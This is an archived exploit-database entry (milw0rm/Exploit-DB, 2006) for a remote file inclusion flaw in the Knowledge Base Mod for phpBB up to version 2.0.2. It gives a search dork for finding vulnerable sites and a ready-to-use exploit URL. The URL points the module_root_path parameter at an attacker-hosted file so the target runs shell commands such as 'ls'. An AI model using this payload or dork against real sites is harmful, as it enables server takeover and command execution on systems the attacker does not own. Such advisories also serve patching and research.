Knowledge Base Mod 2.0.2 - 'phpBB' Remote File Inclusion

EDB-ID:

1728


Author:

[Oo]

Type:

webapps


Platform:

PHP

Date:

2006-04-29


Title: Knowledge Base Mod for PHPbb <= 2.0.2 remote file inclusion
URL: http://www.phpbb2.de/dload.php?action=file&file_id=538
Dork: "Powered by Knowledge Base"
Credits: [Oo]

Exploit: /includes/kb_constants.php?module_root_path=http://yourhost/cmd.gif?cmd=ls

# milw0rm.com [2006-04-29]